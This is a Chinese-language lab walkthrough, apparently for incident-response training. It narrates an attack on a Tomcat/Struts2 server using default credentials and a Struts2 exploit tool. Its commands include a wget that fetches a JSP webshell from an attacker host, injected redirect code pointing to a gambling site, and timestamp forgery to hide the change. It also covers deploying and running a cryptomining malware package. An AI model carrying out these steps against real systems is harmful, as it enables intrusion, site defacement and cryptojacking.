本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
一、环境搭建
访问目标网站,一般都会有个首页如下图所示
靶场环境、使用的工具、bingdu样本,放在了 知识星球 与 我的资源 中,整理资源不易,请理解。
二、模拟攻击
2.1 渗透进网站getshell
第一步:
访问目标网站,发现是8080端口,接下来测试网站的脚本语言
输入index.html、index.php页面报错,index.jsp页面正常,说明网站是由JAVA语言编写,
第二步:
使用御剑扫描(字典最好自己整理,添加一些常见漏洞的URL)
通过扫描结果我们可以看出网站存有struts2框架,并且可以猜测出目标网站是tomcat搭建的,那么我们可以从两个思路出发:
1、测试网站是否存在tomcat弱口令漏洞
2、测试网站是否存在struts漏洞
思路一
访问tomcat默认后台路径 http://XXX:8080/manager/html
输入tomcat默认账号密码 tomcat/tomcat后,成功登录进网站
登录进后台后,可以通过部署war包的形式getshell (此处不演示了)
部署war包geshell,参考教程https://blog.csdn.net/weixin_40412037/article/details/106261564
思路二
使用struts2 漏洞检查利用工具
执行whoami命令查看是root权限
接下来让目标系统去下载webshell
wget http://192.168.184.1/config.jsp
使用命令
find / -name ROOT
找到网站根路径:/opt/tomcat9/webapps/ROOT
之后将config.jsp文件移动到ROOT目录(tomcat默认存放网站的目录)
mv config.jsp /opt/tomcat9/webapps/ROOT/config.jsp
之后再次访问wenshell,成功解析
使用菜刀连接 http://192.168.184.142:8080/config.jsp
2.2 篡改页面,植入暗链
首先记录下网站首页index.jsp的时间,之后将文件下载下来,进行修改
修改index.jsp,在里面加入如下图所示代码
代码的含义:如果通过百度、搜搜、谷歌、搜狗等浏览器访问该网站的话,就自动跳转到 https://www.XXXXXXXX.com 博彩网站
将修改后的index.jsp上传到网站根目录
上传成功后发现时间被修改了,那么我们就修改时间为原来未被篡改的时间
右键,修改时间
2.3 植入挖矿bingdu
使用菜刀上传挖矿bingdu文件update.zip
使用菜刀自带的虚拟终端执行命令,解压update.zip文件,命令:unzip update.zip
解压后运行该文件,命令:./update.sh
那么可以使用struts2漏洞利用工具,运行该文件,命令:./opt/tomcat9/webapps/ROOT/update.sh,过一会儿后,提示执行完成!
之后在进入菜刀的命令执行终端,执行:netstat -anpt 命令,查看服务器的网络连接,如果如下图所示的话,说明bingdu母体成功运行,并且下载了bingdu文件,正在进行挖矿
此时,我们可以去受害者服务器上执行top命令,可以看到挖矿病毒正在运行,CPU消耗非常高
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
